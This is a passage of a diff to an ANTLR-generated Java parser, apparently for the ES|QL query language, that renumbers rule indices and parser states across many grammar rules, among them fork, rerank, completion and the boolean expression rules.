LookupCommandContext(_ctx, getState()); - enterRule(_localctx, 100, RULE_lookupCommand); + enterRule(_localctx, 102, RULE_lookupCommand); try { enterOuterAlt(_localctx, 1); { - setState(480); + setState(484); match(DEV_LOOKUP); - setState(481); + setState(485); ((LookupCommandContext)_localctx).tableName = indexPattern(); - setState(482); + setState(486); match(ON); - setState(483); + setState(487); ((LookupCommandContext)_localctx).matchFields = qualifiedNamePatterns(); } } @@ -3798,22 +3854,22 @@ public T accept(ParseTreeVisitor visitor) { public final InlinestatsCommandContext inlinestatsCommand() throws RecognitionException { InlinestatsCommandContext _localctx = new InlinestatsCommandContext(_ctx, getState()); - enterRule(_localctx, 102, RULE_inlinestatsCommand); + enterRule(_localctx, 104, RULE_inlinestatsCommand); try { enterOuterAlt(_localctx, 1); { - setState(485); + setState(489); match(DEV_INLINESTATS); - setState(486); + setState(490); ((InlinestatsCommandContext)_localctx).stats = aggFields(); - setState(489); + setState(493); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,33,_ctx) ) { case 1: { - setState(487); + setState(491); match(BY); - setState(488); + setState(492); ((InlinestatsCommandContext)_localctx).grouping = fields(); } break; @@ -3869,38 +3925,38 @@ public T accept(ParseTreeVisitor visitor) { public final ChangePointCommandContext changePointCommand() throws RecognitionException { ChangePointCommandContext _localctx = new ChangePointCommandContext(_ctx, getState()); - enterRule(_localctx, 104, RULE_changePointCommand); + enterRule(_localctx, 106, RULE_changePointCommand); try { enterOuterAlt(_localctx, 1); { - setState(491); + setState(495); match(CHANGE_POINT); - setState(492); + setState(496); ((ChangePointCommandContext)_localctx).value = qualifiedName(); - setState(495); + setState(499); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,34,_ctx) ) { case 1: { - setState(493); + setState(497); match(ON); - setState(494); + setState(498); ((ChangePointCommandContext)_localctx).key = qualifiedName(); } break; } - setState(502); + setState(506); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,35,_ctx) ) { case 1: { - setState(497); + setState(501); match(AS); - setState(498); + setState(502); ((ChangePointCommandContext)_localctx).targetType = qualifiedName(); - setState(499); + setState(503); match(COMMA); - setState(500); + setState(504); ((ChangePointCommandContext)_localctx).targetPvalue = qualifiedName(); } break; @@ -3946,13 +4002,13 @@ public T accept(ParseTreeVisitor visitor) { public final InsistCommandContext insistCommand() throws RecognitionException { InsistCommandContext _localctx = new InsistCommandContext(_ctx, getState()); - enterRule(_localctx, 106, RULE_insistCommand); + enterRule(_localctx, 108, RULE_insistCommand); try { enterOuterAlt(_localctx, 1); { - setState(504); + setState(508); match(DEV_INSIST); - setState(505); + setState(509); qualifiedNamePatterns(); } } @@ -3995,13 +4051,13 @@ public T accept(ParseTreeVisitor visitor) { public final ForkCommandContext forkCommand() throws RecognitionException { ForkCommandContext _localctx = new ForkCommandContext(_ctx, getState()); - enterRule(_localctx, 108, RULE_forkCommand); + enterRule(_localctx, 110, RULE_forkCommand); try { enterOuterAlt(_localctx, 1); { - setState(507); + setState(511); match(FORK); - setState(508); + setState(512); forkSubQueries(); } } @@ -4046,12 +4102,12 @@ public T accept(ParseTreeVisitor visitor) { public final ForkSubQueriesContext forkSubQueries() throws RecognitionException { ForkSubQueriesContext _localctx = new ForkSubQueriesContext(_ctx, getState()); - enterRule(_localctx, 110, RULE_forkSubQueries); + enterRule(_localctx, 112, RULE_forkSubQueries); try { int _alt; enterOuterAlt(_localctx, 1); { - setState(511); + setState(515); _errHandler.sync(this); _alt = 1; do { @@ -4059,7 +4115,7 @@ public final ForkSubQueriesContext forkSubQueries() throws RecognitionException case 1: { { - setState(510); + setState(514); forkSubQuery(); } } @@ -4067,7 +4123,7 @@ public final ForkSubQueriesContext forkSubQueries() throws RecognitionException default: throw new NoViableAltException(this); } - setState(513); + setState(517); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,36,_ctx); } while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ); @@ -4113,15 +4169,15 @@ public T accept(ParseTreeVisitor visitor) { public final ForkSubQueryContext forkSubQuery() throws RecognitionException { ForkSubQueryContext _localctx = new ForkSubQueryContext(_ctx, getState()); - enterRule(_localctx, 112, RULE_forkSubQuery); + enterRule(_localctx, 114, RULE_forkSubQuery); try { enterOuterAlt(_localctx, 1); { - setState(515); + setState(519); match(LP); - setState(516); + setState(520); forkSubQueryCommand(0); - setState(517); + setState(521); match(RP); } } @@ -4206,8 +4262,8 @@ private ForkSubQueryCommandContext forkSubQueryCommand(int _p) throws Recognitio int _parentState = getState(); ForkSubQueryCommandContext _localctx = new ForkSubQueryCommandContext(_ctx, _parentState); ForkSubQueryCommandContext _prevctx = _localctx; - int _startState = 114; - enterRecursionRule(_localctx, 114, RULE_forkSubQueryCommand, _p); + int _startState = 116; + enterRecursionRule(_localctx, 116, RULE_forkSubQueryCommand, _p); try { int _alt; enterOuterAlt(_localctx, 1); @@ -4217,11 +4273,11 @@ private ForkSubQueryCommandContext forkSubQueryCommand(int _p) throws Recognitio _ctx = _localctx; _prevctx = _localctx; - setState(520); + setState(524); forkSubQueryProcessingCommand(); } _ctx.stop = _input.LT(-1); - setState(527); + setState(531); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,37,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -4232,16 +4288,16 @@ private ForkSubQueryCommandContext forkSubQueryCommand(int _p) throws Recognitio { _localctx = new CompositeForkSubQueryContext(new ForkSubQueryCommandContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_forkSubQueryCommand); - setState(522); + setState(526); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(523); + setState(527); match(PIPE); - setState(524); + setState(528); forkSubQueryProcessingCommand(); } } } - setState(529); + setState(533); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,37,_ctx); } @@ -4285,11 +4341,11 @@ public T accept(ParseTreeVisitor visitor) { public final ForkSubQueryProcessingCommandContext forkSubQueryProcessingCommand() throws RecognitionException { ForkSubQueryProcessingCommandContext _localctx = new ForkSubQueryProcessingCommandContext(_ctx, getState()); - enterRule(_localctx, 116, RULE_forkSubQueryProcessingCommand); + enterRule(_localctx, 118, RULE_forkSubQueryProcessingCommand); try { enterOuterAlt(_localctx, 1); { - setState(530); + setState(534); processingCommand(); } } @@ -4329,11 +4385,11 @@ public T accept(ParseTreeVisitor visitor) { public final RrfCommandContext rrfCommand() throws RecognitionException { RrfCommandContext _localctx = new RrfCommandContext(_ctx, getState()); - enterRule(_localctx, 118, RULE_rrfCommand); + enterRule(_localctx, 120, RULE_rrfCommand); try { enterOuterAlt(_localctx, 1); { - setState(532); + setState(536); match(DEV_RRF); } } @@ -4382,28 +4438,28 @@ public T accept(ParseTreeVisitor visitor) { public final InferenceCommandOptionsContext inferenceCommandOptions() throws RecognitionException { InferenceCommandOptionsContext _localctx = new InferenceCommandOptionsContext(_ctx, getState()); - enterRule(_localctx, 120, RULE_inferenceCommandOptions); + enterRule(_localctx, 122, RULE_inferenceCommandOptions); try { int _alt; enterOuterAlt(_localctx, 1); { - setState(534); + setState(538); inferenceCommandOption(); - setState(539); + setState(543); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,38,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(535); + setState(539); match(COMMA); - setState(536); + setState(540); inferenceCommandOption(); } } } - setState(541); + setState(545); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,38,_ctx); } @@ -4451,15 +4507,15 @@ public T accept(ParseTreeVisitor visitor) { public final InferenceCommandOptionContext inferenceCommandOption() throws RecognitionException { InferenceCommandOptionContext _localctx = new InferenceCommandOptionContext(_ctx, getState()); - enterRule(_localctx, 122, RULE_inferenceCommandOption); + enterRule(_localctx, 124, RULE_inferenceCommandOption); try { enterOuterAlt(_localctx, 1); { - setState(542); + setState(546); identifier(); - setState(543); + setState(547); match(ASSIGN); - setState(544); + setState(548); inferenceCommandOptionValue(); } } @@ -4504,9 +4560,9 @@ public T accept(ParseTreeVisitor visitor) { public final InferenceCommandOptionValueContext inferenceCommandOptionValue() throws RecognitionException { InferenceCommandOptionValueContext _localctx = new InferenceCommandOptionValueContext(_ctx, getState()); - enterRule(_localctx, 124, RULE_inferenceCommandOptionValue); + enterRule(_localctx, 126, RULE_inferenceCommandOptionValue); try { - setState(548); + setState(552); _errHandler.sync(this); switch (_input.LA(1)) { case QUOTED_STRING: @@ -4522,7 +4578,7 @@ public final InferenceCommandOptionValueContext inferenceCommandOptionValue() th case OPENING_BRACKET: enterOuterAlt(_localctx, 1); { - setState(546); + setState(550); constant(); } break; @@ -4530,7 +4586,7 @@ public final InferenceCommandOptionValueContext inferenceCommandOptionValue() th case QUOTED_IDENTIFIER: enterOuterAlt(_localctx, 2); { - setState(547); + setState(551); identifier(); } break; @@ -4586,26 +4642,26 @@ public T accept(ParseTreeVisitor visitor) { public final RerankCommandContext rerankCommand() throws RecognitionException { RerankCommandContext _localctx = new RerankCommandContext(_ctx, getState()); - enterRule(_localctx, 126, RULE_rerankCommand); + enterRule(_localctx, 128, RULE_rerankCommand); try { enterOuterAlt(_localctx, 1); { - setState(550); + setState(554); match(DEV_RERANK); - setState(551); + setState(555); ((RerankCommandContext)_localctx).queryText = constant(); - setState(552); + setState(556); match(ON); - setState(553); + setState(557); rerankFields(); - setState(556); + setState(560); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,40,_ctx) ) { case 1: { - setState(554); + setState(558); match(WITH); - setState(555); + setState(559); inferenceCommandOptions(); } break; @@ -4662,29 +4718,29 @@ public T accept(ParseTreeVisitor visitor) { public final CompletionCommandContext completionCommand() throws RecognitionException { CompletionCommandContext _localctx = new CompletionCommandContext(_ctx, getState()); - enterRule(_localctx, 128, RULE_completionCommand); + enterRule(_localctx, 130, RULE_completionCommand); try { enterOuterAlt(_localctx, 1); { - setState(558); - match(COMPLETION); setState(562); + match(COMPLETION); + setState(566); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,41,_ctx) ) { case 1: { - setState(559); + setState(563); ((CompletionCommandContext)_localctx).targetField = qualifiedName(); - setState(560); + setState(564); match(ASSIGN); } break; } - setState(564); + setState(568); ((CompletionCommandContext)_localctx).prompt = primaryExpression(0); - setState(565); + setState(569); match(WITH); - setState(566); + setState(570); ((CompletionCommandContext)_localctx).inferenceId = identifierOrParameter(); } } @@ -4893,14 +4949,14 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc int _parentState = getState(); BooleanExpressionContext _localctx = new BooleanExpressionContext(_ctx, _parentState); BooleanExpressionContext _prevctx = _localctx; - int _startState = 130; - enterRecursionRule(_localctx, 130, RULE_booleanExpression, _p); + int _startState = 132; + enterRecursionRule(_localctx, 132, RULE_booleanExpression, _p); int _la; try { int _alt; enterOuterAlt(_localctx, 1); { - setState(597); + setState(601); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,45,_ctx) ) { case 1: @@ -4909,9 +4965,9 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _ctx = _localctx; _prevctx = _localctx; - setState(569); + setState(573); match(NOT); - setState(570); + setState(574); booleanExpression(8); } break; @@ -4920,7 +4976,7 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new BooleanDefaultContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(571); + setState(575); valueExpression(); } break; @@ -4929,7 +4985,7 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new RegexExpressionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(572); + setState(576); regexBooleanExpression(); } break; @@ -4938,41 +4994,41 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new LogicalInContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(573); + setState(577); valueExpression(); - setState(575); + setState(579); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(574); + setState(578); match(NOT); } } - setState(577); + setState(581); match(IN); - setState(578); + setState(582); match(LP); - setState(579); + setState(583); valueExpression(); - setState(584); + setState(588); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(580); + setState(584); match(COMMA); - setState(581); + setState(585); valueExpression(); } } - setState(586); + setState(590); _errHandler.sync(this); _la = _input.LA(1); } - setState(587); + setState(591); match(RP); } break; @@ -4981,21 +5037,21 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new IsNullContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(589); + setState(593); valueExpression(); - setState(590); + setState(594); match(IS); - setState(592); + setState(596); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(591); + setState(595); match(NOT); } } - setState(594); + setState(598); match(NULL); } break; @@ -5004,13 +5060,13 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new MatchExpressionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(596); + setState(600); matchBooleanExpression(); } break; } _ctx.stop = _input.LT(-1); - setState(607); + setState(611); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,47,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -5018,7 +5074,7 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc if ( _parseListeners!=null ) triggerExitRuleEvent(); _prevctx = _localctx; { - setState(605); + setState(609); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,46,_ctx) ) { case 1: @@ -5026,11 +5082,11 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new LogicalBinaryContext(new BooleanExpressionContext(_parentctx, _parentState)); ((LogicalBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_booleanExpression); - setState(599); + setState(603); if (!(precpred(_ctx, 5))) throw new FailedPredicateException(this, "precpred(_ctx, 5)"); - setState(600); + setState(604); ((LogicalBinaryContext)_localctx).operator = match(AND); - setState(601); + setState(605); ((LogicalBinaryContext)_localctx).right = booleanExpression(6); } break; @@ -5039,18 +5095,18 @@ private BooleanExpressionContext booleanExpression(int _p) throws RecognitionExc _localctx = new LogicalBinaryContext(new BooleanExpressionContext(_parentctx, _parentState)); ((LogicalBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_booleanExpression); - setState(602); + setState(606); if (!(precpred(_ctx, 4))) throw new FailedPredicateException(this, "precpred(_ctx, 4)"); - setState(603); + setState(607); ((LogicalBinaryContext)_localctx).operator = match(OR); - setState(604); + setState(608); ((LogicalBinaryContext)_localctx).right = booleanExpression(5); } break; } } } - setState(609); + setState(613); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,47,_ctx); } @@ -5171,31 +5227,31 @@ public T accept(ParseTreeVisitor visitor) { public final RegexBooleanExpressionContext regexBooleanExpression() throws RecognitionException { RegexBooleanExpressionContext _localctx = new RegexBooleanExpressionContext(_ctx, getState()); - enterRule(_localctx, 132, RULE_regexBooleanExpression); + enterRule(_localctx, 134, RULE_regexBooleanExpression); int _la; try { - setState(640); + setState(644); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,52,_ctx) ) { case 1: _localctx = new LikeExpressionContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(610); + setState(614); valueExpression(); - setState(612); + setState(616); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(611); + setState(615); match(NOT); } } - setState(614); + setState(618); match(LIKE); - setState(615); + setState(619); string(); } break; @@ -5203,21 +5259,21 @@ public final RegexBooleanExpressionContext regexBooleanExpression() throws Recog _localctx = new RlikeExpressionContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(617); + setState(621); valueExpression(); - setState(619); + setState(623); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(618); + setState(622); match(NOT); } } - setState(621); + setState(625); match(RLIKE); - setState(622); + setState(626); string(); } break; @@ -5225,41 +5281,41 @@ public final RegexBooleanExpressionContext regexBooleanExpression() throws Recog _localctx = new LikeListExpressionContext(_localctx); enterOuterAlt(_localctx, 3); { - setState(624); + setState(628); valueExpression(); - setState(626); + setState(630); _errHandler.sync(this); _la = _input.LA(1); if (_la==NOT) { { - setState(625); + setState(629); match(NOT); } } - setState(628); + setState(632); match(LIKE); - setState(629); + setState(633); match(LP); - setState(630); + setState(634); string(); - setState(635); + setState(639); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(631); + setState(635); match(COMMA); - setState(632); + setState(636); string(); } } - setState(637); + setState(641); _errHandler.sync(this); _la = _input.LA(1); } - setState(638); + setState(642); match(RP); } break; @@ -5314,28 +5370,28 @@ public T accept(ParseTreeVisitor visitor) { public final MatchBooleanExpressionContext matchBooleanExpression() throws RecognitionException { MatchBooleanExpressionContext _localctx = new MatchBooleanExpressionContext(_ctx, getState()); - enterRule(_localctx, 134, RULE_matchBooleanExpression); + enterRule(_localctx, 136, RULE_matchBooleanExpression); int _la; try { enterOuterAlt(_localctx, 1); { - setState(642); + setState(646); ((MatchBooleanExpressionContext)_localctx).fieldExp = qualifiedName(); - setState(645); + setState(649); _errHandler.sync(this); _la = _input.LA(1); if (_la==CAST_OP) { { - setState(643); + setState(647); match(CAST_OP); - setState(644); + setState(648); ((MatchBooleanExpressionContext)_localctx).fieldType = dataType(); } } - setState(647); + setState(651); match(COLON); - setState(648); + setState(652); ((MatchBooleanExpressionContext)_localctx).matchQuery = constant(); } } @@ -5417,16 +5473,16 @@ public T accept(ParseTreeVisitor visitor) { public final ValueExpressionContext valueExpression() throws RecognitionException { ValueExpressionContext _localctx = new ValueExpressionContext(_ctx, getState()); - enterRule(_localctx, 136, RULE_valueExpression); + enterRule(_localctx, 138, RULE_valueExpression); try { - setState(655); + setState(659); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,54,_ctx) ) { case 1: _localctx = new ValueExpressionDefaultContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(650); + setState(654); operatorExpression(0); } break; @@ -5434,11 +5490,11 @@ public final ValueExpressionContext valueExpression() throws RecognitionExceptio _localctx = new ComparisonContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(651); + setState(655); ((ComparisonContext)_localctx).left = operatorExpression(0); - setState(652); + setState(656); comparisonOperator(); - setState(653); + setState(657); ((ComparisonContext)_localctx).right = operatorExpression(0); } break; @@ -5556,14 +5612,14 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE int _parentState = getState(); OperatorExpressionContext _localctx = new OperatorExpressionContext(_ctx, _parentState); OperatorExpressionContext _prevctx = _localctx; - int _startState = 138; - enterRecursionRule(_localctx, 138, RULE_operatorExpression, _p); + int _startState = 140; + enterRecursionRule(_localctx, 140, RULE_operatorExpression, _p); int _la; try { int _alt; enterOuterAlt(_localctx, 1); { - setState(661); + setState(665); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,55,_ctx) ) { case 1: @@ -5572,7 +5628,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _ctx = _localctx; _prevctx = _localctx; - setState(658); + setState(662); primaryExpression(0); } break; @@ -5581,7 +5637,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _localctx = new ArithmeticUnaryContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(659); + setState(663); ((ArithmeticUnaryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==PLUS || _la==MINUS) ) { @@ -5592,13 +5648,13 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _errHandler.reportMatch(this); consume(); } - setState(660); + setState(664); operatorExpression(3); } break; } _ctx.stop = _input.LT(-1); - setState(671); + setState(675); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,57,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -5606,7 +5662,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE if ( _parseListeners!=null ) triggerExitRuleEvent(); _prevctx = _localctx; { - setState(669); + setState(673); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,56,_ctx) ) { case 1: @@ -5614,9 +5670,9 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _localctx = new ArithmeticBinaryContext(new OperatorExpressionContext(_parentctx, _parentState)); ((ArithmeticBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_operatorExpression); - setState(663); + setState(667); if (!(precpred(_ctx, 2))) throw new FailedPredicateException(this, "precpred(_ctx, 2)"); - setState(664); + setState(668); ((ArithmeticBinaryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(((((_la - 89)) & ~0x3f) == 0 && ((1L << (_la - 89)) & 7L) != 0)) ) { @@ -5627,7 +5683,7 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _errHandler.reportMatch(this); consume(); } - setState(665); + setState(669); ((ArithmeticBinaryContext)_localctx).right = operatorExpression(3); } break; @@ -5636,9 +5692,9 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _localctx = new ArithmeticBinaryContext(new OperatorExpressionContext(_parentctx, _parentState)); ((ArithmeticBinaryContext)_localctx).left = _prevctx; pushNewRecursionContext(_localctx, _startState, RULE_operatorExpression); - setState(666); + setState(670); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(667); + setState(671); ((ArithmeticBinaryContext)_localctx).operator = _input.LT(1); _la = _input.LA(1); if ( !(_la==PLUS || _la==MINUS) ) { @@ -5649,14 +5705,14 @@ private OperatorExpressionContext operatorExpression(int _p) throws RecognitionE _errHandler.reportMatch(this); consume(); } - setState(668); + setState(672); ((ArithmeticBinaryContext)_localctx).right = operatorExpression(2); } break; } } } - setState(673); + setState(677); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,57,_ctx); } @@ -5808,13 +5864,13 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc int _parentState = getState(); PrimaryExpressionContext _localctx = new PrimaryExpressionContext(_ctx, _parentState); PrimaryExpressionContext _prevctx = _localctx; - int _startState = 140; - enterRecursionRule(_localctx, 140, RULE_primaryExpression, _p); + int _startState = 142; + enterRecursionRule(_localctx, 142, RULE_primaryExpression, _p); try { int _alt; enterOuterAlt(_localctx, 1); { - setState(682); + setState(686); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,58,_ctx) ) { case 1: @@ -5823,7 +5879,7 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _ctx = _localctx; _prevctx = _localctx; - setState(675); + setState(679); constant(); } break; @@ -5832,7 +5888,7 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _localctx = new DereferenceContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(676); + setState(680); qualifiedName(); } break; @@ -5841,7 +5897,7 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _localctx = new FunctionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(677); + setState(681); functionExpression(); } break; @@ -5850,17 +5906,17 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc _localctx = new ParenthesizedExpressionContext(_localctx); _ctx = _localctx; _prevctx = _localctx; - setState(678); + setState(682); match(LP); - setState(679); + setState(683); booleanExpression(0); - setState(680); + setState(684); match(RP); } break; } _ctx.stop = _input.LT(-1); - setState(689); + setState(693); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,59,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { @@ -5871,16 +5927,16 @@ private PrimaryExpressionContext primaryExpression(int _p) throws RecognitionExc { _localctx = new InlineCastContext(new PrimaryExpressionContext(_parentctx, _parentState)); pushNewRecursionContext(_localctx, _startState, RULE_primaryExpression); - setState(684); + setState(688); if (!(precpred(_ctx, 1))) throw new FailedPredicateException(this, "precpred(_ctx, 1)"); - setState(685); + setState(689); match(CAST_OP); - setState(686); + setState(690); dataType(); } } } - setState(691); + setState(695); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,59,_ctx); } @@ -5940,22 +5996,22 @@ public T accept(ParseTreeVisitor visitor) { public final FunctionExpressionContext functionExpression() throws RecognitionException { FunctionExpressionContext _localctx = new FunctionExpressionContext(_ctx, getState()); - enterRule(_localctx, 142, RULE_functionExpression); + enterRule(_localctx, 144, RULE_functionExpression); int _la; try { int _alt; enterOuterAlt(_localctx, 1); { - setState(692); + setState(696); functionName(); - setState(693); + setState(697); match(LP); - setState(707); + setState(711); _errHandler.sync(this); switch (_input.LA(1)) { case ASTERISK: { - setState(694); + setState(698); match(ASTERISK); } break; @@ -5978,34 +6034,34 @@ public final FunctionExpressionContext functionExpression() throws RecognitionEx case QUOTED_IDENTIFIER: { { - setState(695); + setState(699); booleanExpression(0); - setState(700); + setState(704); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,60,_ctx); while ( _alt!=2 && _alt!=org.antlr.v4.runtime.atn.ATN.INVALID_ALT_NUMBER ) { if ( _alt==1 ) { { { - setState(696); + setState(700); match(COMMA); - setState(697); + setState(701); booleanExpression(0); } } } - setState(702); + setState(706); _errHandler.sync(this); _alt = getInterpreter().adaptivePredict(_input,60,_ctx); } - setState(705); + setState(709); _errHandler.sync(this); _la = _input.LA(1); if (_la==COMMA) { { - setState(703); + setState(707); match(COMMA); - setState(704); + setState(708); mapExpression(); } } @@ -6018,7 +6074,7 @@ public final FunctionExpressionContext functionExpression() throws RecognitionEx default: break; } - setState(709); + setState(713); match(RP); } } @@ -6060,11 +6116,11 @@ public T accept(ParseTreeVisitor visitor) { public final FunctionNameContext functionName() throws RecognitionException { FunctionNameContext _localctx = new FunctionNameContext(_ctx, getState()); - enterRule(_localctx, 144, RULE_functionName); + enterRule(_localctx, 146, RULE_functionName); try { enterOuterAlt(_localctx, 1); { - setState(711); + setState(715); identifierOrParameter(); } } @@ -6115,32 +6171,32 @@ public T accept(ParseTreeVisitor visitor) { public final MapExpressionContext mapExpression() throws RecognitionException { MapExpressionContext _localctx = new MapExpressionContext(_ctx, getState()); - enterRule(_localctx, 146, RULE_mapExpression); + enterRule(_localctx, 148, RULE_mapExpression); int _la; try { enterOuterAlt(_localctx, 1); { - setState(713); + setState(717); match(LEFT_BRACES); - setState(714); + setState(718); entryExpression(); - setState(719); + setState(723); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(715); + setState(719); match(COMMA); - setState(716); + setState(720); entryExpression(); } } - setState(721); + setState(725); _errHandler.sync(this); _la = _input.LA(1); } - setState(722); + setState(726); match(RIGHT_BRACES); } } @@ -6188,15 +6244,15 @@ public T accept(ParseTreeVisitor visitor) { public final EntryExpressionContext entryExpression() throws RecognitionException { EntryExpressionContext _localctx = new EntryExpressionContext(_ctx, getState()); - enterRule(_localctx, 148, RULE_entryExpression); + enterRule(_localctx, 150, RULE_entryExpression); try { enterOuterAlt(_localctx, 1); { - setState(724); + setState(728); ((EntryExpressionContext)_localctx).key = string(); - setState(725); + setState(729); match(COLON); - setState(726); + setState(730); ((EntryExpressionContext)_localctx).value = constant(); } } @@ -6464,17 +6520,17 @@ public T accept(ParseTreeVisitor visitor) { public final ConstantContext constant() throws RecognitionException { ConstantContext _localctx = new ConstantContext(_ctx, getState()); - enterRule(_localctx, 150, RULE_constant); + enterRule(_localctx, 152, RULE_constant); int _la; try { - setState(770); + setState(774); _errHandler.sync(this); switch ( getInterpreter().adaptivePredict(_input,67,_ctx) ) { case 1: _localctx = new NullLiteralContext(_localctx); enterOuterAlt(_localctx, 1); { - setState(728); + setState(732); match(NULL); } break; @@ -6482,9 +6538,9 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new QualifiedIntegerLiteralContext(_localctx); enterOuterAlt(_localctx, 2); { - setState(729); + setState(733); integerValue(); - setState(730); + setState(734); match(UNQUOTED_IDENTIFIER); } break; @@ -6492,7 +6548,7 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new DecimalLiteralContext(_localctx); enterOuterAlt(_localctx, 3); { - setState(732); + setState(736); decimalValue(); } break; @@ -6500,7 +6556,7 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new IntegerLiteralContext(_localctx); enterOuterAlt(_localctx, 4); { - setState(733); + setState(737); integerValue(); } break; @@ -6508,7 +6564,7 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new BooleanLiteralContext(_localctx); enterOuterAlt(_localctx, 5); { - setState(734); + setState(738); booleanValue(); } break; @@ -6516,7 +6572,7 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new InputParameterContext(_localctx); enterOuterAlt(_localctx, 6); { - setState(735); + setState(739); parameter(); } break; @@ -6524,7 +6580,7 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new StringLiteralContext(_localctx); enterOuterAlt(_localctx, 7); { - setState(736); + setState(740); string(); } break; @@ -6532,27 +6588,27 @@ public final ConstantContext constant() throws RecognitionException { _localctx = new NumericArrayLiteralContext(_localctx); enterOuterAlt(_localctx, 8); { - setState(737); + setState(741); match(OPENING_BRACKET); - setState(738); + setState(742); numericValue(); - setState(743); + setState(747); _errHandler.sync(this); _la = _input.LA(1); while (_la==COMMA) { { { - setState(739); + setState(743); match(COMMA); - setState(740); + setState(744); numericValue(); } } - setState(745); + setState(749); _errHandler.sync(this); _la = 